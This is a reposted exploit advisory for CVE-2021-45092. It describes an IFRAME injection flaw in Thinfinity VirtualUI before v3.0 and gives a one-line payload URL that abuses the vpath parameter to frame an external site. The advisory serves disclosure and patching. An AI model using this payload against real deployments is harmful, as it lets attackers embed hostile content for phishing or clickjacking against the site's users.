Exploit/Advisories
Published on February 22nd, 2022 📆 | 8124 Views ⚑
0Thinfinity VirtualUI 2.5.41.0 IFRAME Injection – Torchsec
Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
Version: Thinfinity VirtualUI < v3.0
Tested on: Microsoft Windows
CVE: CVE-2021-45092
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
Version: Thinfinity VirtualUI < v3.0
Tested on: Microsoft Windows
CVE: CVE-2021-45092
How it works
By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed).
Payload
The vulnerable vector is "https://example.com/lab.html?vpath=//wikipedia.com
Vulnerable versions
It has been tested in VirtualUI version 2.1.37.2, 2.1.42.2, 2.5.0.0, 2.5.36.1, 2.5.36.2 and 2.5.41.0.
References
https://github.com/cybelesoft/virtualui/issues/2
https://www.tenable.com/cve/CVE-2021-45092
https://twitter.com/danielmofer
Gloss